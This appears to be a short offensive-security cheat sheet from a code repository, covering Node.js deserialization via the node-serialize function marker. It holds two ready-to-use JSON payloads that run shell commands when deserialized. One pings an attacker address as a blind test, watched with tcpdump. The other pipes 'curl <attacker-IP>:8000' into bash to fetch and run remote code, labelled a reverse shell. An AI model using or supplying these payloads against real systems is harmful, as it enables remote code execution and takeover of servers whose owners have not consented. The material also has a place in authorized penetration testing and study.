540 B

Raw Blame History

De/Serialization

_$$ND_FUNC$$_function (){} is executed after parsing

Example Payloads

Encode, send and wait with sudo tcpdump -i <interface> icmp

{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('ping -c 10 <attacker-IP>', function(error, stdout, stderr) { console.log(stdout) });\n }()"}

reverse shell via

{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('curl <attacker-IP>:8000 | bash', function(error, stdout, stderr) { console.log(stdout) });\n }()"}